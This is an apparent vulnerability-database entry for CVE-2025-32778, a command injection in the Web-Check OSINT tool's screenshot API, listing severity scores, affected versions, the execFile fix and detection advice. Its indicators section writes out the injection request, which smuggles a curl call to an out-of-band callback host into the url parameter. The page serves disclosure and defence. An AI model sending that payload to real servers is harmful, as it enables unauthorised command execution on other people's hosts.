cbcvebase.
CVE-2025-32778
published 2025-04-15

CVE-2025-32778: Web-Check is an all-in-one OSINT tool for analyzing any website. A command injection vulnerability exists in the screenshot API of the Web Check project…

PriorityP187critical9.3CVSS 4.0
AVNACLATNPRNUINVCHVIHVAHSCNSINSANEXCRXIRXARXMAVXMACXMATXMPRXMUIXMVCXMVIXMVAXMSCXMSIXMSAXSXAUXRXVXREXUX
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
19.98%
97.1th percentile
Web-Check is an all-in-one OSINT tool for analyzing any website. A command injection vulnerability exists in the screenshot API of the Web Check project (Lissy93/web-check). The issue stems from user-controlled input (url) being passed unsanitized into a shell command using exec(), allowing attackers to execute arbitrary system commands on the underlying host. This could be exploited by sending crafted url parameters to extract files or even establish remote access. The vulnerability has been patched by replacing exec() with execFile(), which avoids using a shell and properly isolates arguments.

Affected

1 ranges
VendorProductVersion rangeFixed in
lissy93web-check< 2.0.12.0.1

Detection & IOCsextracted from sources · hover to see the quote

url/api/screenshot?url=http://x%22%3bcurl${IFS}http://{{interactsh-url}}%3b%23
path/api/screenshot
commandGET /api/screenshot?url=http://x";curl${IFS}<callback>;#
hash0e4958aa10b2650d32439a799f6fc83a7cd46cef
  • Monitor HTTP GET requests to /api/screenshot where the `url` query parameter contains shell metacharacters such as `;`, `%3b`, `%22`, `${IFS}`, or `#` — these are indicators of command injection attempts.
  • Alert on outbound HTTP/DNS requests from the web server process (e.g., Node.js/Chromium) to unexpected external hosts, which may indicate successful command injection via the screenshot API (e.g., curl callback to an OOB interaction server).
  • Detect use of child_process.exec() with user-supplied `url` parameter in Web-Check's directChromiumScreenshot() function; vulnerable instances will NOT have commit 0e4958aa10b2650d32439a799f6fc83a7cd46cef applied.
  • Use interactsh or similar OOB callback detection: a successful probe will trigger an HTTP interaction from the target server, confirming RCE via the injected curl command.
  • Fingerprint vulnerable Web-Check instances by checking for the string 'Web Check' in the response body (case-insensitive) before probing the screenshot endpoint.
  • ·The vulnerability only exists in Web-Check instances running code prior to commit 0e4958aa10b2650d32439a799f6fc83a7cd46cef. Patched instances use execFile() instead of exec(), which does not invoke a shell and therefore neutralizes the injection.
  • ·The injection point is specifically the `url` query parameter of the /api/screenshot endpoint; other endpoints are not described as affected by this CVE.

CVSS provenance

nvdv4.09.3CRITICALCVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vulncheck9.3CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.